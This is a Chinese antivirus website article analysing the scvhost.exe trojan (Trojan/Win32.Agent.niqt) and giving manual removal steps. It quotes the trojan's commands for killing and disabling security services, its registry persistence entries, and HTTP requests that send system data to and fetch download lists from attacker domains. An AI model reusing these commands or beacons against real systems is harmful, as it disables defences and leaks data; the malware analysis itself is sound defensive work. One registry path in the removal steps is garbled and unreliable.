首页-专杀工具-杀毒学院-杀毒软件-防火墙-辅助工具-网络安全新闻-杀毒方法-在线杀毒-专题-漏洞-杀毒论坛 rss
杀毒网 > 杀毒方法 > scvhost.exe病毒Trojan/Win32.Agent.niqt查杀

scvhost.exe病毒Trojan/Win32.Agent.niqt查杀

2009-07-13 来源:安天防线
网络安全提示:该恶意代码为木马,病毒运行后隐藏开启一个notepad.exe(记事本)进程,查找类名Notepad的窗体,找到之后向该窗体发送WM_CLOSE消息

该恶意代码为木马,病毒运行后隐藏开启一个"notepad.exe"(记事本)进程,查找类名"Notepad"的窗体,找到之后向该窗体发送WM_CLOSE消息,隐藏调用CMD命令禁用"ekrn"(安全软件)服务,并结束ekrn.exe安全软件进程,创建随机病毒名DLL文件到%Windir%目录下,调用rundll32.exe启动病毒DLL文件,等待1000ms后再将病毒DLL文件删除,再次调用CMD命令行停止禁用部分系统安全软件服务进程,再次创建病毒文件到%Windir%目录下并启动创建后的病毒文件,动态加载系统库文件"advapi32.dll"获取服务相关API函数,释放驱动文件到%System32%\drivers\目录下,创建病毒注册表服务以服务方式启动病毒,等待驱动文件启动之后再删除驱动文件,将自身文件移动到%System32%目录下命名为scvhost.exe伪装系统文件,删除注册表run键值下所有启动项,并在RUN键下添加scvhost.exe病毒的启动路径。

行为分析-本地行为

1、文件运行后会释放以下文件
%Windir%\tete357484t.dll 该病毒DLL文件释放驱动文件映像劫持各大杀软的主程序停止并删除大量安全软件进程
%Windir%\extext422203t.exe 该病毒文件提升当前所在用户访问权限、停止禁用安全软件服务连接网络发送统计信息下载恶意文件
%System32%\scvhost.exe 病毒原体文件
%System32%\drivers\pcidump.sys 该驱动文件恢复SSDT躲避删除安全软件服务躲避杀软主动防御警报

2、创建病毒服务及RUN启动项
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\pcidump\DisplayName
值: 字符串: "pcidump"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\pcidump\ImagePath
值: 字符串: "\??\C:\WINDOWS\system32\drivers\pcidump.sys."
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\pcidump\Start
值: DWORD: 4 (0x4)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\pcidump\Type
值: DWORD: 1 (0x1)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
值: 字符串: "\??\C:\WINDOWS\system32\drivers\scvhost.exe"

3、病毒运行后隐藏开启一个"notepad.exe"(记事本)进程,查找类名"Notepad"的窗体,找到之后向该窗体发送WM_CLOSE消息,通过以下指令隐藏调用CMD命令禁用“ekrn”(安全软件)服务,并结束ekrn.exe安全软件进程
cmd.exe /c taskkill.exe /im ekrn.exe /f
cmd /c sc config ekrn start= disabled
cmd /c net stop wscsvc
cmd /c net stop SharedAccess
cmd /c sc config sharedaccess start= disabled

4、动态加载系统库文件"advapi32.dll"获取服务相关API函数
OpenServiceA、ControlService、DeleteService、CloseServiceHandle

行为分析-网络行为

GET /os004/count.asp?mac=00c0298c9db6&ver=090703&os=WinXP&dtime=2009-7-3 HTTP/1.1
User-Agent: baidu
Host: 98love98.cn
Cache-Control: no-cache
描述:收集操作系统相关信息向病毒作者指定的地址发送到统计信息
GET /xx4/ttnew.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: pw.88mw.com
Connection: Keep-Alive
描述:连接网络读取TXT列表容易下载病毒文件

清除方案

1、使用安天防线可彻底清除此病毒

2、手工清除请按照行为分析删除对应文件,恢复相关系统设置。

(1) 使用ATOOL进程管理结束extext422203t.exe病毒进程。

(2) 强行删除病毒下载的大量病毒文件
%Windir%\extext422203t.exe     
%System32%\scvhost.exe

(3)删除病毒创建的注册表服务及RUN启动项
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\pcidump
键值:"WinSSCOM"
删除pcidump键下所有的键值

HKEY_LOCAL_MACHINE\SOFTWARE\Microso2\drivers\scvhost.exe"
删除RUN键值下的"\??\C:\WINDOWS\systft\Windows\CurrentVersion\Run
值: 字符串: "\??\C:\WINDOWS\system3em32\drivers\scvhost.exe"项

关于:scvhost.exe病毒 的文章
    杀毒网推荐文章
    杀毒方法文章
    网站地图 - 杀毒论坛 - 网站投稿 - 广告服务 - 帮助中心 - 联系我们
    Copyright ©2007 www.Antidu.cn All Rights Reserved